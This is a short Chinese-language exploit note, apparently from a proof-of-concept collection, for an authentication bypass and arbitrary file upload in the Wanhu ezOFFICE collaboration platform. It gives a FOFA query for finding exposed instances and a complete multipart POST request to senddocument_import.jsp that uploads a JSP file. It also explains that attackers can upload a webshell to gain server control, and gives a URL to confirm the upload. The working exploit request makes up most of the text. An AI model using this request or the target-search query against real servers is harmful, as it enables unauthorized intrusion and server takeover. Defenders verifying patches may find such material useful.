W1-16万户-ezOffice-文件上传
漏洞描述:
万户 ezOFFICE 协同管理平台 senddocument_import.jsp、OfficeServer.jsp等接口处存在鉴权绕过并且可以上传任意文件,攻击者可上传恶意木马获取服务器权限。
网站图片:
网络测绘:
fofa语法:
FOFA:app=“ezOFFICE协同管理平台”
漏洞复现:
payload:
POST /defaultroot/modules/govoffice/gov_documentmanager/senddocument_import.jsp;ad?categoryId=null&path=loginpage&mode=add&fileName=null&saveName=null&fileMaxSize=0&fileMaxNum=null&fileType=jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 435
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLNvGnzm2o3sImhz
Accept-Encoding: gzip, deflate
Connection: close
------WebKitFormBoundaryvLNvGnzm2o3sImhz
Content-Disposition: form-data; name="photo"; filename="11.jsp"
Content-Type: application/octet-stream
<% out.println("Hello ezOFFICE"); %>
------WebKitFormBoundaryvLNvGnzm2o3sImhz
Content-Disposition: form-data; name="continueUpload"
0
------WebKitFormBoundaryvLNvGnzm2o3sImhz
Content-Disposition: form-data; name="submit"
导 入
------WebKitFormBoundaryvLNvGnzm2o3sImhz--
效果图: PS:响应体会回显当前日期的文件名
验证url
http://your-ip/defaultroot/upload/loginpage/回显的文件名;fds